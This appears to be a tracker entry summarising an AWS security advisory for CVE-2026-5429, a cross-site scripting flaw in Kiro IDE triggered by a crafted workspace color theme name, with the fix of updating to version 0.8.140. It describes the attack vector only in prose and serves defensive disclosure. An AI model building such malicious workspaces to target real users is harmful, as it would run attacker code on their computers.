CVE-2026-5429 - Kiro IDE Webview Cross-Site Scripting via Workspace Color Theme
highvulnerability
security
Source: AWS Security BulletinsApril 14, 2026
Summary
Kiro IDE (a development environment that uses AI agents to help developers) has a cross-site scripting vulnerability (XSS, where an attacker injects malicious code that runs in a web browser) in versions before 0.8.140. An attacker can exploit this by creating a malicious workspace with a crafted color theme name, and if a user opens and trusts that workspace, the attacker's code will execute on their computer.
Solution / Mitigation
Update Kiro IDE to version 0.8.140 or later.
Classification
Attack Type
Other
Attack SophisticationModerate
Impact (CIA+S)
integrityconfidentiality
Affected Vendors
Amazon
Related Issues
Monthly digest — independent AI security research
Original source: https://aws.amazon.com/security/security-bulletins/rss/2026-012-aws/
First tracked: April 14, 2026 at 02:00 PM
Classified by LLM (prompt v3) · confidence: 85%